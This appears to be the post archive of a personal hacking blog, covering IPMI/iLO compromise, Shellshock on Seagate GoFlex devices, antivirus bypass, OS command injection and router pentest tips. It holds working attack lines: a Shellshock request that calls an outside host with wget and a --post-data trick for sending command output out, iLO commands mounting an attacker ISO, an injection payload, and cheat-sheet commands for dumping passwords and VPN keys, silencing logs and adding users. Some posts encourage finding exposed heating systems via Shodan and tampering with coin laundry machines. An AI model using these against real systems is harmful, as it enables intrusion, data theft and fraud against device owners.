Monday, August 25, 2025
When AI Just Doesn’t Get the Joke.
Friday, March 28, 2025
Bypass Cylance AV to run PowerShell Scripts.
Challenge accepted!
My first attempt was to use EncodedCommand, but wasted a bunch of time and gave up, lol. It has to be a, what I would say is a non-standard base64 encoding, to execute. Didn't find that out until I was a few hours in! Trying to find an easy way to ecode never panned out, even the great cyberchef failed me.
So I couldn't run PS scripts out right and didn't have time for EncodedCommand "im sure I was just doing something wong", so I moved on to Invoke-Expression (IE).
M$ says, "The Invoke-Expression cmdlet evaluates or runs a specified string as a command and returns the results of the expression or command. Without Invoke-Expression, a string submitted at the command line is returned (echoed) unchanged."
So we can use IE to execute any string, First I tried to just put my script in a variable, but PS never liked it. I think the line breaks or some char was messing it up, Then looked at reading a file and putting it into a variable. So I base64 encoded the text from my script and used [Convert]::FromBase64String to decode then wrote it to a file in C:\Users\Public\ because I couldn't be sure what user context it was going to write in so I bet on low privileges. Then used Get-Content -Raw to pull it into a variable, passed it to IE and Whammy! it worked. The most complicated process I could come up with to bypass Cylance PS script blocking :)
Enjoy the 1's and 0's
Tuesday, February 18, 2025
IPMI exposure over the internet, IPMIPWN & post compromise activities.
ssh backdoor2@target.comUnable to negotiate with target.com port 22: no matching key exchange method found. Their offer: diffie-hellman-group14-sha1,diffie-hellman-group1-sha1
Google said to added -o KexAlgorithms=diffie-hellman-group14-sha1, Then:
ssh -o KexAlgorithms=diffie-hellman-group14-sha1 backdoor2@target.com
Unable to negotiate with target.com port 22: no matching host key type found. Their offer: ssh-dss
And then:
ssh -o KexAlgorithms=diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-dss backdoor2@target.com
Unable to negotiate with target.com port 22: no matching cipher found. Their offer: aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc
And then:
ssh -o KexAlgorithms=diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-dss -c aes256-cbc backdoor2@target.com
Unable to negotiate with target.com port 22: no matching MAC found. Their offer: hmac-sha1
And then:
C:\Users\hacker> ssh -o KexAlgorithms=diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-dss -c aes256-cbc -m hmac-sha1 backdoor2@target.com
The authenticity of host 'target.com' can't be established.
DSA key fingerprint is SHA256:LkuLO3/0BBf4iCXIeOO/d9kjh987trtA30pZZkS/ruc.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'target.com' (DSA) to the list of known hosts.
backdoor2@target.com's password:
User:backdoor2 logged-in to ILOBRC444.(target.com)
iLO 3 Standard 1.26 at Aug 26 2011
Server Name: SER_EPAPAR
Server Power: On
</>hpiLO->
Ok, so IPMIPWN got us this far, what next? A few possible attack paths might involve virtual media (VM) functionality. Here is how that might be setup:
First, See what VM is loaded if any
</>hpiLO-> show map1/oemhp_vm1/cddr1
Set our own VM
</>hpiLO-> cd map1/oemhp_vm1/cddr1
</map1/oemhp_vm1/cddr1>hpiLO-> set oemhp_image=http://cracker/evil.iso
Enable our "attacker controlled" VM
</>hpiLO-> set /map1/oemhp_vm1/cddr1 oemhp_boot=connect
Confirm our changes
</map1/oemhp_vm1/cddr1>hpiLO-> show
I used webhook.site to confirm this attack with great successes, as soon as you set oemhp_boot to connect, you should start seeing connection requests. You could also make your own Kali ISO that has a script to connect to a server somewhere, run on boot or network connection confirmation. More attack paths later >:)
Enjoy the 1's and 0's..
Thursday, January 2, 2025
Wednesday, September 4, 2024
Getting a remote shell on Seagate GoFlex devices is still a thing almost ten years later!
Since I have been on a stroll down memory lane, I thought it would be fun to also revisit some of the bigger issues I have reported on in the past, like Getting a remote shell on any one of 68,000+ Seagate GoFlex devices. I found these devices are still plentiful on Shodan and despite all the time that has past. That's not all as they now easier to verify thanks to web services like webhook.site. In the past verifying you had RCE with these devices and the Shellshock bug in general could be tricky, but having something available to the public that catches callbacks makes it so much simpler.
Here is what the new payload looks like using webhook.site:
GET /support/ HTTP/1.1
Host: vuln.device.ip.here
User-Agent: () { :; }; echo Content-Type: text/plain; echo; echo;
PATH=/usr/bin:/usr/local/bin:/bin; export PATH; wget
http://webhook.site/866285eb-9c4f-4269-997c-6c4d3a960139/a -O /tmp/junk2>&1;
Here is what it looks like when it hits webhook:
If your testing this out your self and using webhook to verify execution, and you see something like the above on your webhook session, w00t! You have just successfully verified its vulnerable to shellshock, it has wget installed and its allowed to make calls outside of its network!
Going a bit further you can also exploit this Shellshock webhook.site combo to exfiltrate some information from our target by adding the --post-data flag to our wget payload with a bash command surrounded by backticks, like this:
--post-data `id`
wget will send the output of the command as post data to webhook :)
It blows my mind we can still find these on the internets, and even more so that after 9 years no one is patching anything. If you have devices in your network, please for the love of all that is good, update your firmware!
That's it for now, enjoy the 1's and 0's
Friday, August 2, 2024
Arctic Code Vault Contributor: ✓
Sunday, June 30, 2024
Hack3r Achievement Obtained!
You may have seen on my X feed by now, but if not. I am proud to say my IPMIPWN tool was added to not only Kali Linux, but to BlackArch Linux as well!! This happened earlier, but I haven't bragged on the blog yet :) It's so amazing it was so well liked and used! I hope it has helped many hackers in their education and professional careers.
If you somehow don't know about these projects, welcome skiddy and go here and here and RTFM :P
I loving giving back to the scene that has helped me so much and I am always trying to do more. Now I can say I honestly have in a "I hope" meaningful way! Thanks to whoever found my tool worthy and all the people at the Kali and BackArch organizations. You are all awesome! Thank you!!
Enjoy the 1's and 0's :)
Wednesday, June 12, 2024
Go Tell That Spammer, The Scammer, The Crypto Jacker. Tell'em That God's Gonna Cut'em Down.
I will start with a Facebook/Zelle scan that was tried against my wife. So Cmoney was posting stuff on FB to sell, she was asking around $200 for the item and she got a hit that same night at around 4AM. He wanted to pay and come get it ASAP, but said he wanted to use Zelle to buy it then come get it later that day. as he was at work. We didn't use Zelle so we asked if he could use any other service, which he said no and said he will pass. Well Cmoney wanted to sell this thing so we got a Zelle account to accommodate this guy. We gave him our Zelle info to send money, which he then says he sent the payment, but nothing showed up on our end, then an email came saying this BS:
For your account to be credited fully with the sum of $230.00 USD You are required to send the sum of
$100.00 USD (FIRST) to the buyer’s Zelle information for your buyer’s safety
We of course were all, yeah f that. Thats when I took a deeper look at the email from "Zelle" and noticed the from address was zellepay.customerservices024975@gmail.com which is obviously not a Zelle email, but you dont see that URL until you go into header details, just a hover over the form/to area in gmail shows the below:
So the email is so long that google cuts off the TLD and all you see is the zelle portion. Here is a look at the expanded headers view:
Friday, April 26, 2024
Getting GSMEvil2 working on Debian.
So MOST of the instructions on GSMEvil2's github work fine with the exception of the pip guidance. Here is what I had to use to get it working:
pip3 install pyshark flask flask_socketio==4.3.2 pysqlite3
Yeah its a short post, Deal with it :P
Saturday, February 10, 2024
Heating control system meinETA open to attack with Hax11
meinETA is a heating control system that can be accessed remotely via a password protected portal, however since it uses X11 to expose the GUI to the user, if you can get the IP of the meinETA system this portal can be bypassed and you can manipulate the system directly with Hax11 as seen below.
The ETA site says this about meinETA:
meinETA: the free internet platform
If your heating boiler is connected to the internet, you can see and change all heating settings on your mobile, tablet or PC. So you always have a handle on your heating, wherever you are! When you login to www.meinETA.at, you see the touchscreen as if you were standing right in front of the boiler!
This means that with Hax11 you have full control of the system, without the need for the portal, just needing the systems IP. This would seem to be a big hurdal, but a few minutes on shodan and you can track systems down and be in full control with just a few keystrokes and clicks of the mouse. There doesn't seem to be any sort of authentication on the GUI, not even a pin code so there is nothing stopping you once you locate one.
More on ETA
Get Hax11 HERE
Thursday, October 5, 2023
Update to Hax11 allows connect to more display ports for larger attack surface
I have updated Hax11 to connect to non-default display ports. The previous version only allowed connecting to display 0 "port 6000", but now you can connect to any a system has available.
Example:
If you want to connect to display 1 "port 6001" use this command:
python hax11.py ip.addr.here 1
If you want to connect to display 0 use the old command style:
python hax11.py ip.addr.here
You can connect to display 1, 2, 3, and so on. I know it seems like a small change, but it doubles or more your attack surface. So while the change is small, the impact is big.
Get it HERE
Enjoy!
Saturday, April 1, 2023
smilePOS RCE via MS .NET Remoting
While searching the internets for MS .NET Remoting deployments to test my service name brute force script, I stumbled on a gem.
Monday, March 20, 2023
Automate brute forcing service names in vulnerable MS .NET Remoting deployments.
I wanted to hack up something to make it less painful, so I searched the web for common object names, then searched github for MS .NET Remoting apps and added the names they were using as well. Then coded up a little bash script that uses the ExploitRemotingService tool and loops through the list I compiled. Testing so far shows it works like a charm with a few bugs.
Still I thought it could be a nice tool to have in your bag of holding so I am made it available on github. I hope someone gets use of it.
Usage: ./bfNET ip.addr port
Get it here
Friday, January 13, 2023
Getting free cycles out of coin operated laundry machines
A friend of mine was telling me about how her landlord keeps raising the price on the washer and dryer in her apartment complex. She knew I liked playin with tech and machines so she asked if we could figure out how to get the coins out. I explained that would be a bad idea as it would be clear something was up if the machines never had money in them on collection day, but maybe we could figure out a way to get free use of them, which would be harder to detect. A door with a lock on top of the housing for the coin mechanism had a tubal lock as seen below:
So I busted out my picks and got the door to open. Here is what I found when I bypassed the lock:
As you can see it's just a few wires, I figured this was our access point to free cycles. You can see the white bracket to connect the coin functions to the machine as seen below:Friday, October 7, 2022
Useful AOS (Adtran OS) CLI commands and tips for pentesting
Below is some junk for AOS you might find useful in a pentest.
CLI cmds:
Turns on privileged commands "all below commands assume enable command executed with success":
enable
Disable logging for session
no events all
From here for easy hacking and if the system is in a DMZ, hanging off the inet or the proper ports are exposed, just enable the http server and continue from there.
configure terminal
http server 80
If you cant access the http server the cmds below should help get some info out of the system.
Lists users and PWs
show running-config | include username #displays usernames and passwords.
Add new user with op privs
configure terminal
username operator privilege 10 password unencrypted passwd1
List IPs
show ip interfaces
Download a file to target system *after running cmd below you will be promoted for more data and you will need an tftp server running that is accessible by the target"
copy tftp flash "or cflash"
Download file from target to your system
copy flash tftp
View vpns name and preshared keys
show crypto ike remote-id
View vpns configs *below cmd should give all client configs, you add the name at end to view only that names config
show crypto ike congratulation pool
View vpns policy
show crypto ike policy
TCL script to set up a VPN in the AOS CLI with walk through:
https://supportcommunity.adtran.com/jmaxz83287/attachments/jmaxz83287/nv-aos/182/1/Configuring%20Main%20Mode%20and%20Remote%20Client%20VPN%20in%20the%20AOS%20CLI.pdf
AOS CLI reference:
https://supportcommunity.adtran.com/jmaxz83287/attachments/jmaxz83287/nv-aos/428/7/AOS%20R13.12.0%20Command%20Reference%20Guide.pdf
If you have anything to add please hit me up and let me know, i would love to see this grow!
Labels: adtran, aos, cheatsheet, pentest
Monday, August 29, 2022
Hax11 updated!
Hax11 has been updated to work on the latest kali and its still a target rich envirometn out there folks! Get it HERE and get to hax0rin :)
Friday, July 8, 2022
VBox OpenVAS Appliance
Recently I have been trying to get OpenVAS running, on any thing other than my laptop, tried Raspberry Pi, Docker, then a bare metal install of Ubuntu. No joy at all ever. So I gave up and finally got it running on a Kali install using Virtual Box in my laptop. Did work on the OpenVAS config to get you running faster, exported then and got the VBos image running on my server to confirm. After all the pain and time lost of installing and setup I figured I would export it as an appliance and share with the net. You can get it here
Some notes:
- ssh is running on 22022 login is user:asd123 "Change that pw ASAP"
- You have to ssh in as user to start OVAS "sudo gvm-start"
- Also change root pw as it as asd123 as well
- GVM web ui is on port 5050
- admin:asd123 "change that pw ASAP"
- VBox is set to forward the ports so whatever system you install it on is the IP you need to connect to with the ports set to 22022 for ssh and 5050 for OVAS
- Might also be a good idea to ssh in and update the feeds.
- tops IP list is top 1000 TCP and top 100 UDP
- Full and fast Clone 1 is Full and fast w/o DoS and a few other checks
- Profit??
Sunday, March 6, 2022
GRGSM hacked/back ported/added legacy support/or somethig for the hackrf
This is a modified version of the grgsm_livemon to make it work with hackrf, for some reason they took it out of recent distractions including RF focused linux distros like DragonOS. That was foolish, so I brought I would bring back the joy. Open in GNU Radio Companion, build, and play.
Example usage after building: python grgsm_livemon.py -a -g 30 -f [freq]M
Get it HERE
Friday, February 4, 2022
Yahoo! blunder to Facebook account recovery joy
A friend of my wife and I, came to us wanting to know how she can get into a old Facebook account that she forgot the password of. She created it back when FB was first introduced to the public and It had messages and pics from a family member that passed, so we wanted to help her if we could.
Friday, January 7, 2022
Hacking around with os injection
During a recent pentest of an app made with php, burp gave me a little surprise of a os commend injection notification! I had fun playing around with it and it was in the oddest place. Burp had interaction with collaborator so it was a solid notification.
The issue was found in one of the apps upload functions in a var called KeyId. Which was i think passed to the php system call (or exec,passthru,etc.) for some reason. Here is the payload burp was using to get collaborator interaction:
14316'"`0&nslookup -q=cname fo70trk51oioge2t1p2zzdvvdmjp7fvcj46wul.burpcollaborator.net.&`'
So for RCE I needed to use a str like:
14316'"`0&< CMD >











